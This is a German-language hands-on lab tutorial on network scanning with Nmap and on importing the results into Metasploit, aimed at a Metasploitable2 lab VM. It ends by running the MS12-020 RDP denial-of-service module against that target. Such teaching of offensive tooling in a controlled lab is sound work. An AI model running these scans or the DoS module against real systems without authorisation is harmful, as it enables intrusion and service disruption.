Einführung
In diesem Lab lernen Sie, wie Sie Nmap und Metasploit für Netzwerkscans und Schwachstellenanalysen verwenden können. Nmap (Network Mapper) ist ein leistungsstarkes Open-Source-Tool für die Netzwerkermittlung und Sicherheitsüberprüfung, während Metasploit ein weit verbreitetes Penetration-Testing-Framework ist, das eine Vielzahl von Exploitationstools und Payloads enthält.
Das Ziel dieses Labs besteht darin, Ihnen praktische Erfahrungen bei der Verwendung von Nmap für verschiedene Arten von Scans zu vermitteln, die Ergebnisse zu analysieren und Metasploit zu nutzen, um potenzielle Schwachstellen auf einem Zielsystem weiter zu untersuchen.
Einrichten der Umgebung
In diesem Schritt richten Sie die Lab-Umgebung ein, indem Sie den Kali Linux-Container und die Metasploitable2-Virtuelle Maschine starten.
sudo virsh start Metasploitable2
Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.
Testen Sie, ob die virtuelle Maschine gestartet und läuft, indem Sie sie per Ping testen:
ping 192.168.122.102
Starten Sie als Nächstes den Kali Linux-Container und treten Sie in seine Bash-Umgebung ein:
docker run -ti --network host b5b709a49cd5 bash
Testen Sie die virtuelle Netzwerkverbindung im Kali-Container. Verwenden Sie Ctrl-C, um den Ping-Vorgang zu beenden:
ping 192.168.122.102
Grundlegende Nmap-Nutzung
In diesem Schritt lernen Sie, wie Sie Nmap für grundlegende Scantasks wie Host-Discovery (Host-Ermittlung), Port-Scanning (Port-Scan), Version-Detection (Versionserkennung) und Betriebssystemerkennung verwenden können.
Führen Sie einen umfassenden Scan durch, indem Sie den folgenden Befehl ausführen:
nmap -T4 -A 192.168.122.102
Führen Sie einen Host-Discovery-Scan durch, indem Sie den folgenden Befehl ausführen:
nmap -T4 -sn 192.168.122.102
Führen Sie einen Port-Scan durch, indem Sie den folgenden Befehl ausführen:
nmap -T4 192.168.122.102
Führen Sie die Betriebssystemerkennung durch, indem Sie den folgenden Befehl ausführen:
nmap -T4 -O 192.168.122.102
Die Option -T4 setzt die Timing-Vorlage (Zeitsteuerung) auf einen aggressiven Scan, während die Option -A die Betriebssystemerkennung, das Version-Scanning, das Script-Scanning und das Traceroute aktiviert. Die Option -sn führt einen einfachen Host-Discovery-Scan durch, und die Option -O versucht, das entfernte Betriebssystem zu erkennen.
Fortgeschrittene Nmap-Nutzung
In diesem Schritt werden Sie fortgeschrittenere Nmap-Scantechniken erkunden, wie das Scannen ganzer Subnetze, bestimmter Portbereiche und die Angabe einer Netzwerkschnittstelle.
Scannen Sie ein gesamtes Subnetz, indem Sie den folgenden Befehl ausführen:
nmap 127.0.0.1/24
Scannen Sie bestimmte Ports, indem Sie den folgenden Befehl ausführen:
nmap -p80,22,66 127.0.0.1
Listen Sie lokale Netzwerkschnittstellen auf, indem Sie den folgenden Befehl ausführen:
nmap --iflist
Geben Sie eine Netzwerkschnittstelle an, indem Sie den folgenden Befehl ausführen:
nmap -e eth0 127.0.0.1
Diese fortgeschrittenen Techniken ermöglichen es Ihnen, Ihre Scans zu optimieren und detailliertere Informationen über das Zielnetzwerk oder die Zielhosts zu sammeln.
Importieren von Nmap-Scanergebnissen in Metasploit
In diesem Schritt lernen Sie, wie Sie Nmap-Scanergebnisse in Metasploit importieren, um sie weiter zu analysieren und auszunutzen.
- Führen Sie einen umfassenden Scan durch und speichern Sie die Ausgabe in einer XML-Datei, indem Sie den folgenden Befehl ausführen. Stellen Sie sicher, dass Sie die XML-Datei im Home-Verzeichnis
~/ablegen. Dieser Schritt kann einige Zeit in Anspruch nehmen:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
- Starten Sie die Metasploit-Konsole:
cd ~
service postgresql start
msfdb init
msfconsole
- Importieren Sie die XML-Datei in Metasploit, indem Sie den folgenden Befehl in der Metasploit-Konsole ausführen:
db_import shiyanlou.xml
- Zeigen Sie die importierten Dienste an, indem Sie den folgenden Befehl in der Metasploit-Konsole ausführen:
services
- Drücken Sie
Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung
Durch das Importieren der Nmap-Scanergebnisse in Metasploit können Sie die leistungsstarken Tools und Module des Metasploit-Frameworks nutzen, um Schwachstellen auf dem Zielsystem zu analysieren und möglicherweise auszunutzen.
Verwendung von Modulen in Metasploit
In diesem Schritt lernen Sie, wie Sie nach Modulen im Metasploit-Framework suchen und diese nutzen können.
- Zunächst sollten Sie, wenn Sie nicht bereits in der Metasploit-Konsole sind, die Metasploit-Konsole starten:
cd ~
msfconsole
- Jetzt können Sie mithilfe des Befehls
searchin der Metasploit-Konsole nach Modulen suchen:
search ms12-020
- Um ein Modul in der Metasploit-Konsole zu verwenden:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- Zeigen Sie die verfügbaren Optionen für das Modul in der Metasploit-Konsole an:
show options
- Legen Sie die erforderlichen Optionen in der Metasploit-Konsole fest:
set RHOST 192.168.122.102
- Führen Sie das Modul in der Metasploit-Konsole aus:
exploit
- Drücken Sie
Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung
Metasploit bietet eine Vielzahl von Modulen für verschiedene Zwecke, wie Exploits, Payloads, Hilfsmodule und mehr. Indem Sie nach dem geeigneten Modul suchen und es verwenden, können Sie versuchen, Schwachstellen auszunutzen oder andere Aktionen auf dem Zielsystem auszuführen.
Zusammenfassung
In diesem Lab haben Sie gelernt, wie Sie Nmap für Netzwerkscans und Informationsgewinnung nutzen können, sowie wie Sie die Scanergebnisse in Metasploit importieren, um sie weiter zu analysieren und auszunutzen. Sie haben praktische Erfahrungen mit verschiedenen Nmap-Scantechniken gesammelt, darunter Host-Discovery (Host-Ermittlung), Port-Scanning (Port-Scan), Version-Detection (Versionserkennung) und Betriebssystemerkennung. Darüber hinaus haben Sie gelernt, wie Sie im Metasploit-Framework nach Modulen suchen und diese nutzen können, um möglicherweise Schwachstellen auf dem Zielsystem auszunutzen.
Im Laufe des Labs haben Sie essentielle Fähigkeiten für Penetrationstests geübt, wie das Einrichten einer kontrollierten Umgebung, das Durchführen von Reconnaissance (Aufklärung) und das Analysieren potenzieller Schwachstellen. Diese Fähigkeiten sind im Bereich der Cybersicherheit von entscheidender Bedeutung und helfen Ihnen, ein tieferes Verständnis von Netzwerksicherheitskonzepten und ethischen Hacking-Techniken zu entwickeln.



